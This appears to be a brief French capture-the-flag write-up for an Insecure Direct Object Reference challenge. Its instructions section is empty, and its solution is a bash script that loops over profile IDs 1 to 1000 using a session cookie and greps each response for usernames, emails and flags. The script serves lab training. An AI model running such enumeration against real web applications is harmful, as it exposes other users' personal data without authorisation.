Insecure Direct Object Reference (IDOR)
Consignes
Réalisation
#!/bin/bash
URL="http://ctfd-0.int.ecole2600.com:47738/profile/"
COOKIE="session=eyJ1c2VyX2lkIjo0OTR9.aBvQQg.j43d6jKzVuVB8ZlTrHNuWBu4LWo"
for id in {1..1000}; do
echo "[*] Testing ID $id"
curl -s -b "$COOKIE" "$URL$id" | grep -Ei "Username|Email|Profile|Flag" && echo ">> ID $id found interesting"
doneLast updated